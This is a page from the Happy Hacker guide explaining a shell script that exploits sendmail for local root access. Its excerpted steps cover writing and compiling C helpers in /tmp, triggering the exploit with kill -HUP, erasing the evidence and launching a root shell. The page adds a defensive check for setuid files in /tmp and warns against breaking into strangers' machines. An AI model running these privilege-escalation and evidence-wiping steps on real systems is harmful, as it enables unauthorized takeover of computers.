Shell Programming: an Exploit Explained, continued...

        Now save it as s.sh.  The "sh" at the end of the name tells you it is a shell script. After saving it, be sure to make it executable by giving the command "chmod 700 s.sh".  That means only you (or someone in your shell account) can run this program.  If you want anyone to be able to run it, give the command "chmod 777".

        What does this cute little shell script do?  It writes C programming language commands into two files, "leshka.c" and "smtpd.c", puts them in the right directories on your computer, compiles them, makes them executable, runs them, then erases them, then prompts the user to enter his or her brand new Unix shell, "/tmp/sh", inside of which the user will discover he or she is root (the superuser with control over the entire victim computer).

        Let's take this program apart so we understand how it does its thing. 

1) It writes two C programs.  For example, the file leshka.c is written with the shell commands:

echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c


2) Next the script compiles both C programs:

cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c


        Note that you must know the command to run the C compiler on that computer.  If the C compiler command is "gcc", then substitute "gcc" for "cc" in this line of the shell script.

        You also must know the path to sendmail.  Check it with the command "whereis sendmail".  If it has a different path than "/usr/sbin/sendmail", you must substitute the correct path.

3) Next this shell script runs the shell command that triggers the exploit:

kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`


4) It takes an instant to erase the evidence:

rm leshka.c leshka smtpd.c /tmp/smtpd

5) Then it sends a message to the screen:

echo "Now type:   /tmp/sh"

        That reminds you to give the command /tmp/sh to get into your own private root shell.  You have to do this quickly because this exploit only lets you get into a root shell for a short time.
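If you administer a computer rather than test one, the same walkthrough tells you what to look for: a setuid binary appearing in a world-writable directory such as /tmp, and a daemon running from there instead of from its normal location. The check below is an added example, not part of this guide; the directory list and the "ps -ax" column layout (PID TTY STAT TIME COMMAND) are assumptions you may need to adjust for your Unix.

```shell
#!/bin/sh
# Added defensive check (not from the original guide): find setuid/setgid
# files under temp directories and ps entries whose command runs from them.

# Directories to watch; assumed list, override with SUSPECT_DIRS="..." if needed.
SUSPECT_DIRS="${SUSPECT_DIRS:-/tmp /var/tmp /dev/shm}"

# Print every regular file under the given directories that carries the
# setuid (4000) or setgid (2000) bit. A "/tmp/sh" with mode 4755 shows up here.
find_setid_files() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
    done
}

# Read ps-style lines on stdin (PID TTY STAT TIME COMMAND) and print the PID
# and command of every process whose executable path starts with a watched
# directory, e.g. "/tmp/smtpd" instead of "/usr/sbin/sendmail".
flag_tmp_processes() {
    awk -v dirs="$SUSPECT_DIRS" '
        BEGIN { n = split(dirs, d, " ") }
        NR == 1 && $1 == "PID" { next }        # skip the ps header line
        {
            for (i = 1; i <= n; i++)
                if (index($5, d[i] "/") == 1) { print $1, $5; break }
        }'
}

# Usage: sh check_tmp.sh --scan   (runs both checks on the live system)
if [ "${1:-}" = "--scan" ]; then
    echo "setuid/setgid files in temp directories:"
    find_setid_files $SUSPECT_DIRS
    echo "processes running from temp directories:"
    ps -ax | flag_tmp_processes
fi
```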

==========================================================

You can get punched in the nose warning:  When you are root it is really easy to mess things up.  Even if you have permission to be root, be careful! If a friend gave you permission to break into his computer, just think how he will feel if he has to reinstall his operating system because you hit a wrong key or two!

This is a good reason not to break into a stranger's computer. You may think you are quietly, harmlessly sneaking around, when, boom, you accidentally trash things.

===========================================================

(You can learn much more about how this exploit works on the GTMHH on how to program in C.)

More shell programming --->>


 © 2013 Happy Hacker All rights reserved.